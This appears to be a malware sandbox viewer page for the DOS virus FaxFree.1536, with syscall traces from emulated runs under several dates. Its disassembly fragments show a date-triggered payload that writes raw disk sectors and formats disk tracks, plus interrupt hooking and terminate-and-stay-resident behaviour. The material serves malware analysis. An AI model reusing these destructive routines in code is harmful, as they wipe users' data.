Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.1536

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:17:33.020465278Z	42	PC: 12e53 \| Get date 0x12e53: cmp dh, 4 0x12e56: jne 0x12e81 0x12e58: mov ah, 0x2c 0x12e5a: int 0x21 0x12e5c: mov ah, 0x19 0x12e5e: int 0x21 0x12e60: mov dh, 0 0x12e62: mov cx, 0x34 0x12e65: mov dh, 0 0x12e67: int 0x26 0x12e69: mov ah, 5 0x12e6b: mov al, 8 0x12e6d: mov dx, 0 0x12e70: mov cx, 0 0x12e73: int 0x13 0x12e75: mov ah, 5 0x12e77: mov al, 8 0x12e79: mov dx, 1 0x12e7c: mov cx, 0 0x12e7f: int 0x13
2018-12-17T22:17:33.023003283Z	74	PC: 12b60 \| Reallocate memory
2018-12-17T22:17:33.023988408Z	72	PC: 12b67 \| Allocate memory
2018-12-17T22:17:33.025115019Z	42	PC: 13498 \| Get date 0x13498: ret 0x13499: pop es 0x1349a: add word ptr cs:[0x40], 1 0x134a0: cli 0x134a1: push ax 0x134a2: xor ax, ax 0x134a4: mov es, ax 0x134a6: mov ax, word ptr cs:[0x37] 0x134aa: mov word ptr es:[0x84], ax 0x134ae: mov ax, word ptr cs:[0x39] 0x134b2: mov word ptr es:[0x86], ax 0x134b6: pop ax 0x134b7: call 0x2319e 0x134ba: cmp byte ptr cs:[0x335], 7 0x134c0: je 0x134b7 0x134c2: int 0x21 0x134c4: call 0x2317b 0x134c7: cli 0x134c8: xor ax, ax 0x134ca: mov es, ax
2018-12-17T22:17:33.027061421Z	72	PC: 13247 \| Allocate memory
2018-12-17T22:17:33.028506725Z	75	PC: 13281 \| Execute program
2018-12-17T22:17:33.037339913Z	42	PC: 13ce3 \| Get date 0x13ce3: cmp dh, 4 0x13ce6: jne 0x13d11 0x13ce8: mov ah, 0x2c 0x13cea: int 0x21 0x13cec: mov ah, 0x19 0x13cee: int 0x21 0x13cf0: mov dh, 0 0x13cf2: mov cx, 0x34 0x13cf5: mov dh, 0 0x13cf7: int 0x26 0x13cf9: mov ah, 5 0x13cfb: mov al, 8 0x13cfd: mov dx, 0 0x13d00: mov cx, 0 0x13d03: int 0x13 0x13d05: mov ah, 5 0x13d07: mov al, 8 0x13d09: mov dx, 1 0x13d0c: mov cx, 0 0x13d0f: int 0x13
2018-12-17T22:17:33.040216774Z	53	PC: 13295 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:17:33.041272192Z	37	PC: 132ac \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:17:33.042527466Z	77	PC: 132b0 \| Get program return code
2018-12-17T22:17:33.04738497Z	49	PC: 132b7 \| Terminate and stay resident (Return code = '0' \| Memory size = '96')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3064,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:48:08.236130045Z	42	PC: 12e53 \| Get date 0x12e53: cmp dh, 4 0x12e56: jne 0x12e81 0x12e58: mov ah, 0x2c 0x12e5a: int 0x21 0x12e5c: mov ah, 0x19 0x12e5e: int 0x21 0x12e60: mov dh, 0 0x12e62: mov cx, 0x34 0x12e65: mov dh, 0 0x12e67: int 0x26 0x12e69: mov ah, 5 0x12e6b: mov al, 8 0x12e6d: mov dx, 0 0x12e70: mov cx, 0 0x12e73: int 0x13 0x12e75: mov ah, 5 0x12e77: mov al, 8 0x12e79: mov dx, 1 0x12e7c: mov cx, 0 0x12e7f: int 0x13
2018-12-25T11:48:08.238942154Z	74	PC: 12b60 \| Reallocate memory
2018-12-25T11:48:08.241076022Z	72	PC: 12b67 \| Allocate memory
2018-12-25T11:48:08.243788491Z	42	PC: 13498 \| Get date 0x13498: ret 0x13499: pop es 0x1349a: add word ptr cs:[0x40], 1 0x134a0: cli 0x134a1: push ax 0x134a2: xor ax, ax 0x134a4: mov es, ax 0x134a6: mov ax, word ptr cs:[0x37] 0x134aa: mov word ptr es:[0x84], ax 0x134ae: mov ax, word ptr cs:[0x39] 0x134b2: mov word ptr es:[0x86], ax 0x134b6: pop ax 0x134b7: call 0x2319e 0x134ba: cmp byte ptr cs:[0x335], 7 0x134c0: je 0x134b7 0x134c2: int 0x21 0x134c4: call 0x2317b 0x134c7: cli 0x134c8: xor ax, ax 0x134ca: mov es, ax
2018-12-25T11:48:08.246695377Z	72	PC: 13247 \| Allocate memory
2018-12-25T11:48:08.248866517Z	75	PC: 13281 \| Execute program
2018-12-25T11:48:08.265355575Z	42	PC: 13ce3 \| Get date 0x13ce3: cmp dh, 4 0x13ce6: jne 0x13d11 0x13ce8: mov ah, 0x2c 0x13cea: int 0x21 0x13cec: mov ah, 0x19 0x13cee: int 0x21 0x13cf0: mov dh, 0 0x13cf2: mov cx, 0x34 0x13cf5: mov dh, 0 0x13cf7: int 0x26 0x13cf9: mov ah, 5 0x13cfb: mov al, 8 0x13cfd: mov dx, 0 0x13d00: mov cx, 0 0x13d03: int 0x13 0x13d05: mov ah, 5 0x13d07: mov al, 8 0x13d09: mov dx, 1 0x13d0c: mov cx, 0 0x13d0f: int 0x13
2018-12-25T11:48:08.269765563Z	53	PC: 13295 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:48:08.272046847Z	37	PC: 132ac \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:48:08.27330104Z	77	PC: 132b0 \| Get program return code
2018-12-25T11:48:08.274577777Z	49	PC: 132b7 \| Terminate and stay resident (Return code = '0' \| Memory size = '96')

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3064,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:48:10.093518348Z	42	PC: 12e53 \| Get date 0x12e53: cmp dh, 4 0x12e56: jne 0x12e81 0x12e58: mov ah, 0x2c 0x12e5a: int 0x21 0x12e5c: mov ah, 0x19 0x12e5e: int 0x21 0x12e60: mov dh, 0 0x12e62: mov cx, 0x34 0x12e65: mov dh, 0 0x12e67: int 0x26 0x12e69: mov ah, 5 0x12e6b: mov al, 8 0x12e6d: mov dx, 0 0x12e70: mov cx, 0 0x12e73: int 0x13 0x12e75: mov ah, 5 0x12e77: mov al, 8 0x12e79: mov dx, 1 0x12e7c: mov cx, 0 0x12e7f: int 0x13
2018-12-25T11:48:10.096824128Z	44	PC: 12e5c \| Get time 0x12e5c: mov ah, 0x19 0x12e5e: int 0x21 0x12e60: mov dh, 0 0x12e62: mov cx, 0x34 0x12e65: mov dh, 0 0x12e67: int 0x26 0x12e69: mov ah, 5 0x12e6b: mov al, 8 0x12e6d: mov dx, 0 0x12e70: mov cx, 0 0x12e73: int 0x13 0x12e75: mov ah, 5 0x12e77: mov al, 8 0x12e79: mov dx, 1 0x12e7c: mov cx, 0 0x12e7f: int 0x13 0x12e81: jmp 0x12af8 0x12e84: add byte ptr [bx + si], al 0x12e86: add byte ptr [bx + si], al 0x12e88: add byte ptr [bx + si], al
2018-12-25T11:48:10.099052583Z	25	PC: 12e60 \| Get default drive
2018-12-25T11:48:10.121275029Z	74	PC: 12b60 \| Reallocate memory
2018-12-25T11:48:10.12318555Z	72	PC: 12b67 \| Allocate memory
2018-12-25T11:48:10.130276595Z	42	PC: 13498 \| Get date 0x13498: ret 0x13499: pop es 0x1349a: add word ptr cs:[0x40], 1 0x134a0: cli 0x134a1: push ax 0x134a2: xor ax, ax 0x134a4: mov es, ax 0x134a6: mov ax, word ptr cs:[0x37] 0x134aa: mov word ptr es:[0x84], ax 0x134ae: mov ax, word ptr cs:[0x39] 0x134b2: mov word ptr es:[0x86], ax 0x134b6: pop ax 0x134b7: call 0x2319e 0x134ba: cmp byte ptr cs:[0x335], 7 0x134c0: je 0x134b7 0x134c2: int 0x21 0x134c4: call 0x2317b 0x134c7: cli 0x134c8: xor ax, ax 0x134ca: mov es, ax
2018-12-25T11:48:10.132993182Z	72	PC: 13247 \| Allocate memory
2018-12-25T11:48:10.134760508Z	75	PC: 13281 \| Execute program

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3064,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:48:10.093173117Z	42	PC: 12e53 \| Get date 0x12e53: cmp dh, 4 0x12e56: jne 0x12e81 0x12e58: mov ah, 0x2c 0x12e5a: int 0x21 0x12e5c: mov ah, 0x19 0x12e5e: int 0x21 0x12e60: mov dh, 0 0x12e62: mov cx, 0x34 0x12e65: mov dh, 0 0x12e67: int 0x26 0x12e69: mov ah, 5 0x12e6b: mov al, 8 0x12e6d: mov dx, 0 0x12e70: mov cx, 0 0x12e73: int 0x13 0x12e75: mov ah, 5 0x12e77: mov al, 8 0x12e79: mov dx, 1 0x12e7c: mov cx, 0 0x12e7f: int 0x13
2018-12-25T11:48:10.095870305Z	44	PC: 12e5c \| Get time 0x12e5c: mov ah, 0x19 0x12e5e: int 0x21 0x12e60: mov dh, 0 0x12e62: mov cx, 0x34 0x12e65: mov dh, 0 0x12e67: int 0x26 0x12e69: mov ah, 5 0x12e6b: mov al, 8 0x12e6d: mov dx, 0 0x12e70: mov cx, 0 0x12e73: int 0x13 0x12e75: mov ah, 5 0x12e77: mov al, 8 0x12e79: mov dx, 1 0x12e7c: mov cx, 0 0x12e7f: int 0x13 0x12e81: jmp 0x12af8 0x12e84: add byte ptr [bx + si], al 0x12e86: add byte ptr [bx + si], al 0x12e88: add byte ptr [bx + si], al
2018-12-25T11:48:10.098449135Z	25	PC: 12e60 \| Get default drive
2018-12-25T11:48:10.120956642Z	74	PC: 12b60 \| Reallocate memory
2018-12-25T11:48:10.122357283Z	72	PC: 12b67 \| Allocate memory
2018-12-25T11:48:10.126304598Z	42	PC: 13498 \| Get date 0x13498: ret 0x13499: pop es 0x1349a: add word ptr cs:[0x40], 1 0x134a0: cli 0x134a1: push ax 0x134a2: xor ax, ax 0x134a4: mov es, ax 0x134a6: mov ax, word ptr cs:[0x37] 0x134aa: mov word ptr es:[0x84], ax 0x134ae: mov ax, word ptr cs:[0x39] 0x134b2: mov word ptr es:[0x86], ax 0x134b6: pop ax 0x134b7: call 0x2319e 0x134ba: cmp byte ptr cs:[0x335], 7 0x134c0: je 0x134b7 0x134c2: int 0x21 0x134c4: call 0x2317b 0x134c7: cli 0x134c8: xor ax, ax 0x134ca: mov es, ax
2018-12-25T11:48:10.128594092Z	72	PC: 13247 \| Allocate memory
2018-12-25T11:48:10.13011513Z	75	PC: 13281 \| Execute program

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3064,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:48:10.34406017Z	42	PC: 12e53 \| Get date 0x12e53: cmp dh, 4 0x12e56: jne 0x12e81 0x12e58: mov ah, 0x2c 0x12e5a: int 0x21 0x12e5c: mov ah, 0x19 0x12e5e: int 0x21 0x12e60: mov dh, 0 0x12e62: mov cx, 0x34 0x12e65: mov dh, 0 0x12e67: int 0x26 0x12e69: mov ah, 5 0x12e6b: mov al, 8 0x12e6d: mov dx, 0 0x12e70: mov cx, 0 0x12e73: int 0x13 0x12e75: mov ah, 5 0x12e77: mov al, 8 0x12e79: mov dx, 1 0x12e7c: mov cx, 0 0x12e7f: int 0x13
2018-12-25T11:48:10.347256643Z	74	PC: 12b60 \| Reallocate memory
2018-12-25T11:48:10.34867551Z	72	PC: 12b67 \| Allocate memory
2018-12-25T11:48:10.35028148Z	42	PC: 13498 \| Get date 0x13498: ret 0x13499: pop es 0x1349a: add word ptr cs:[0x40], 1 0x134a0: cli 0x134a1: push ax 0x134a2: xor ax, ax 0x134a4: mov es, ax 0x134a6: mov ax, word ptr cs:[0x37] 0x134aa: mov word ptr es:[0x84], ax 0x134ae: mov ax, word ptr cs:[0x39] 0x134b2: mov word ptr es:[0x86], ax 0x134b6: pop ax 0x134b7: call 0x2319e 0x134ba: cmp byte ptr cs:[0x335], 7 0x134c0: je 0x134b7 0x134c2: int 0x21 0x134c4: call 0x2317b 0x134c7: cli 0x134c8: xor ax, ax 0x134ca: mov es, ax
2018-12-25T11:48:10.352557129Z	72	PC: 13247 \| Allocate memory
2018-12-25T11:48:10.355123249Z	75	PC: 13281 \| Execute program
2018-12-25T11:48:10.371249685Z	42	PC: 13ce3 \| Get date 0x13ce3: cmp dh, 4 0x13ce6: jne 0x13d11 0x13ce8: mov ah, 0x2c 0x13cea: int 0x21 0x13cec: mov ah, 0x19 0x13cee: int 0x21 0x13cf0: mov dh, 0 0x13cf2: mov cx, 0x34 0x13cf5: mov dh, 0 0x13cf7: int 0x26 0x13cf9: mov ah, 5 0x13cfb: mov al, 8 0x13cfd: mov dx, 0 0x13d00: mov cx, 0 0x13d03: int 0x13 0x13d05: mov ah, 5 0x13d07: mov al, 8 0x13d09: mov dx, 1 0x13d0c: mov cx, 0 0x13d0f: int 0x13
2018-12-25T11:48:10.375542903Z	53	PC: 13295 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:48:10.378477488Z	37	PC: 132ac \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:48:10.37965251Z	77	PC: 132b0 \| Get program return code
2018-12-25T11:48:10.380693257Z	49	PC: 132b7 \| Terminate and stay resident (Return code = '0' \| Memory size = '96')